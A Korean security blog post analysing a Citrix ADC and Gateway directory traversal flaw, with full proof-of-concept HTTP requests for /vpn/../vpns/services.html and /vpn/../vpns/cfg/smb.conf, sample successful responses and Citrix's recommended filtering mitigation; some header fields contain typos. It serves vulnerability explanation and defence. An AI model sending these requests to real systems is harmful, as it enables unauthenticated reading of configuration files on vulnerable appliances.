💥 취약점 요약
CitrixADC 및 CitrixGateway 에서 원격 공격자는 디렉토리 통과 요청을 쉽게 보내고 사용자 인증 없이 시스템 구성 파일에서 중요한 정보를 읽고, 임의 코드를 원격으로 실행 할 수 있다.
Directory traversal 취약점을 이용하여 경로명을 잘못 처리할 때 발생되며 시스템 검증은 하지 않고 들어오는 요청에 직접 경로를 사용하게 된다.
/vpn/.. 경로를 포함하여 요청하는 경우 /vpn/services.html은 Citrix 제품에서 실행되는 Apache 서버로 /vpn/..에서 경로를 변환하여 /vpns/로 간단히 진입하게 된다
/vpn/../vpns/services.html |
Apache 시스템에는 해당 취약점이 있으며 이를 통해 원격 공격자는 사용자 인증 없이 디렉토리 통과요청을 이용하고 /vpns/cfg/smb.conf 와 같이 중요한 설정 파일을 액세스 할 수 있게 된다.
/vpn/../cfg/smb.conf |
위 경로를 통해 공격자는 서버의 파일 시스템에서 smb.conf 파일을 읽을 수 있는데 이 파일은 리눅스 시스템에서 사용되는 파일로 samba의 설정 정보가 포함되어 있으며 공격자가 이 파일을 읽을 경우 다음과 같은 정보를 습득할 수 있다
- 공유 디렉토리 및 파일 정보
- 접근 제어 설정
- 로그 설정
- 도메인 및 작업그룹 설정
📌 공격 구문
/vpn/../vpns/services.html
Request
GET /vpn/../vpns/services.html HTTP/1.1
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macitosh; Intel Mac os x 10_13_6) ApplewebKit/537.36 ( KHTML, like Gecho)
Chrome/79.0.3945.88 Safari/537.36
Sec-Fetch-User:?
...
Accept-Language: en-Us,en;q=0.9
* PoC 요청에 대한 성공적인 응답
Response
HTTP/1.1 200 OK
Date: Fir, 10 Jan 2020
...
<HTML>
<HEAD>
<meta http-equiv="Expires" content="Sat, 1 Jan 2000 08:00:00 GMT" />
<META HTTP-EQUIV="Refresh" content="0;URL=/logon/themes/Default/homepage.html">
</HEAD>
<BODY>
</BODY>
</HTML>
/vpn/../vpns/cfg/smb.conf
Request
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macitosh; Intel Mac os x 10_13_6) ApplewebKit/537.36 ( KHTML, like Gecho)
Chrome/79.0.3945.88 Safari/537.36
Sec-Fetch-User:?
...
Accept-Language: en-Us,en;q=0.9
* PoC 요청으로 smb.conf 파일에 성공적으로 액세스
Response
HTTP/1.1 200 OK
Date: Fir, 10 Jan 2020
...
[global]
encrypt passwords = yes
name resolve order = Imhosts wins host bcast
💡 해결방안
Citrix는 사용자에게 특정 응답자 정책을 적용하여 공격 시도를 필터링 할 것을 권장하였다.
Directory traversal 시도 /../ 가 포함된 요청을 차단하고 /techniquesns/ 디렉토리에 엑세스 하려는 요청도 차단하는 기술을 적용하고 있다.
'보안 > 취약점' 카테고리의 다른 글
[PHP Filter chain] LFI2RCE (0) | 2024.08.30 |
---|---|
[CVE-2022-22965] Spring4Shell 취약점 (0) | 2024.05.27 |
[CVE-2018-12116] Node.js SSRF 취약점 (0) | 2024.05.27 |
[CVE-2018-10562] GPON RCE 취약점 (0) | 2024.05.25 |
[CVE-2019-8942] WordPress RCE 취약점 (0) | 2024.05.24 |